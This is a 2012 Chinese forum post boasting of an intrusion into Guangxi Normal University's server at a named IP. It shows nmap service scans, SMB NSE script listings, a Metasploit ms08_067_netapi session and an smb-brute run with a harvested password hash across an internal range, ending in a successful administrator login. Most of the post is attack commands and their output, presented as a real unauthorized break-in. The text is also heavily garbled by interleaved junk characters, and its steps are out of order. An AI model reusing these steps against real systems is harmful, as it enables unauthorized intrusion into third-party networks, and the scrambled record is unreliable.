标题: nmap+msf入侵广西师范 [打印本页] 作者: admin 时间: 2012-12-4 12:46 标题: nmap+msf入侵广西师范 广西师范网站http://202.103.242.241/ ; N- m. Y9 D' e/ |: I G+ W8 q' U3 |( l4 Q0 E
root@bt:~# nmap -sS -sV 202.103.242.2414 v# z7 g0 j) k# M4 z+ U7 ~
& i- c; ?. m6 V B: m
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST 3 H! x# f# n W$ \; Z% G, S0 ^, {2 ~4 _3 ~9 U) p+ Y" q+ _! I- e9 G
Nmap scan report for bogon (202.103.242.241)8 e _, J, y0 n' P. n
# R8 r0 J" L6 y; U1 p7 n: I% n
Host is up (0.00048s latency). 5 a9 |' r/ |' G$ B, J3 F) K# x! r8 L# D- u. H1 m
Not shown: 993 closed ports [2 N( |, ]1 ~8 W- k# u4 A0 r; A$ J7 S. ~2 A
PORT STATE SERVICE VERSION$ S, I1 I8 C1 ^: M9 ]
* }6 Z. u% F8 R1 I) d135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe) . Z9 C9 C' B/ m$ e : p1 z L: A3 R2 H4 H+ G9 ^139/tcp open netbios-ssn' i& u: ?/ N! r! b* i
2 ?) s/ ?0 }' z% f+ S% F) v
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds 2 s: O r, n. U! {; ] : N0 P1 B: A: E0 F+ L& f1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)% s0 |2 F# j5 V2 G' ~2 ?
" A/ S$ T! t8 s* l. R& w! ^6 M
1026/tcp open msrpc Microsoft Windows RPC9 @7 H$ I0 _1 k; d, [0 W
) F' l- T3 B% g2 W
3372/tcp open msdtc? 7 ^2 {. E/ u6 i1 u9 b2 M # e0 s- O2 H6 P* ?3389/tcp open ms-term-serv?# A; G( m3 w; o( H6 z, a' g: d
% t" `% d7 d/ ~) @8 }: _/ ?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :" R% i# I r7 |, _, M
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r 2 }8 B( [* {4 W% _. U y# E# x5 I/ l. S% H, N3 H$ y7 M# b7 S% @2 w
SFGetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions( o1 j# J6 D9 U& p2 x2 M. z
% U+ d; ]# o `7 S$ s' n9 V" N& A2 CSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)( v+ l. A% F i4 o& ?4 n
& y4 F8 n8 K+ K1 bSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO : n& G& ~ Q+ P3 V; G4 m : {3 C3 E2 G7 j1 P6 M( t- P- NSF:ptions,6,”hO\n\x000Z”);/ ?# F- ]- l+ M. _4 I
% Z1 e$ ~4 Z' X1 ~
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)+ a8 G6 u5 n% v5 p- C! |
; ~( ^) D( N7 J# Z* P0 |/ q# P
Service Info: OS: Windows " D2 `. S9 d3 p" x ]- B3 p9 |' j2 E" [ U1 W7 c
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . ) E( D( G4 t; j2 z; x2 O+ ~( z. w+ v4 A0 W: l+ U) j( f% |
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds |+ q* F4 U6 H) _; f w! ~2 y; ]# |7 @' k1 ]1 I, q
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本- N$ r# g! b9 T
! J" |' U* s% ?0 {9 b0 M
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse 0 ?+ U* \. {% k : M9 t4 y. t8 D! c) s2 |-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse % Q. Y6 d* [" [- a2 ?# d# x$ e# n7 @) t: Z' x+ f4 U) A" Q1 w
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse+ a4 n- z4 m' Q5 r* e) Y/ i1 H3 o
4 y( _5 `' z; Q1 T8 Q" I2 K
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse+ P: P- B8 L2 f: H
) P' A+ L# F# c$ d) {* j
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse - d$ h! _: l" n5 c! ~# a2 {" M p& s# f! V+ t
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse / g; K; i- R w$ y k. E" }6 o$ ~# R' z. e3 P; T# s; h% }' c. ^
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse+ s' Y! I/ A" R6 G6 a3 }/ Y
4 D! G7 S1 B2 ?1 b2 g# N* p; T) l; L# Q& ]
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse 4 J- G# ? u8 w2 j5 B1 B& c7 q; p ! q y/ \8 m2 }. c7 d-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse5 _: s# ?( } I, f
2 N1 c' M: D. ~) B- o4 A) [% U-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse2 T' I: [2 m' W6 Y" O; U) @, P
1 Q0 O- c. @% Q7 H0 |' [% J4 z U
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse 8 Q& @" K! a B9 F" ]9 E: M$ t* a9 R( z
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse $ @( k7 F N+ M1 S6 Z) @, x9 c 1 L! P4 O g$ J# |2 y$ n/ ?-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse & R) O0 V' m# h+ t8 o! p/ o/ ?- C( \! P3 _
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse# A9 k3 K' B8 V& K9 S
4 e5 [9 T x) j. qBackground session 2? [y/N] (ctrl+z)2 n% N; Q8 E6 u& C0 m
1 v. e) d. V! a$ p* n( }) Wmsf exploit(ms08_067_netapi) > sessions -l! Z" O/ t. ^7 c( S3 X. f1 h% m
3 J# `' _' O3 uroot@bt:/usr/local/share/nmap/scripts# vim usernames.txt4 g& p% v% h0 t9 r X# F
. x# U k2 n" G
test6 q4 n B2 J- N& W. O$ J/ J
, Q0 l; l- A* ]2 Tadministrator9 w4 K Y5 o* U
5 p* e$ {8 z& \0 e9 u6 y* |# f
root@bt:/usr/local/share/nmap/scripts# vim password.txt ' W3 z% M# Z. v% l, \+ U2 h! e8 L \. M
44EFCE164AB921CAAAD3B435B51404EE% K. F& I+ @6 b3 J
4 C1 d$ s9 t( g. m3 o. e: d3 Proot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 - _% k/ |8 j H- X3 f+ T c. O1 J0 r6 R& b. h
//利用用户名跟获取的hash尝试对整段内网进行登录% {7 Y8 q' n. f, g, e9 r3 F ^) `
$ I6 A5 p( _" r) h8 y. k3 nNmap scan report for 192.168.1.105 6 W% ?" _; R3 j 9 O7 o! L- P+ G. T" d2 _# lHost is up (0.00088s latency). 2 @, Y) T k7 @- x1 Z # Y6 z/ |3 n1 s& e3 i) `# f' ~Not shown: 993 closed ports% h* ^6 S1 c& X8 O _, ?% \4 t' ^3 p
- `2 n- B4 T" k( M; Q7 k: \! v
PORT STATE SERVICE' ?5 R ?1 z7 z) O3 | x) {3 l
) V* k' [- \8 X* b/ k6 o& y
135/tcp open msrpc + k3 H: L! |7 k8 _9 Z$ b: Z- q( y/ b* I! w; ?3 X D
139/tcp open netbios-ssn0 v& S9 e- p) i, Q2 g2 @
9 w9 e9 V, q* e/ N4 L445/tcp open microsoft-ds # T, m2 i7 A5 V: a+ z. {8 G 5 Q0 f& V [1 V' c9 M p- s( f' X6 N1025/tcp open NFS-or-IIS 1 o9 r' n" a @ * w# K7 f; I; n' b R$ a; Q5 {8 h1026/tcp open LSA-or-nterm, V' g; e( E ~2 I" O' [
: d. X+ o+ w/ H3 T. o* [3372/tcp open msdtc# c/ d3 [" y9 n: Q
" s; G( z" `# J _# a9 ^( z
3389/tcp open ms-term-serv 8 O0 u) y) g# D* b1 P/ l7 w; i , x* t- b8 K+ O5 g3 P" p, Q `' pMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems) % |8 G6 `* t( y1 V( S3 b. Z$ x 5 s! m8 \# _: G+ wHost script results: + j E' S6 {) X6 ^ ; O7 W4 n% b. E| smb-brute: $ F: t( g7 l$ ~ : Y3 j9 M2 { D& V$ M3 H" N|_ administrator:<blank> => Login was successful 2 M3 o8 \4 Z; s; ~ / n) i( N( o( {2 @' M, s% [3 k攻击成功,一个简单的msf+nmap攻击~~· ; S; l) A' J( o/ b/ s6 D& y. S$ _# U' u# ?, P/ t* S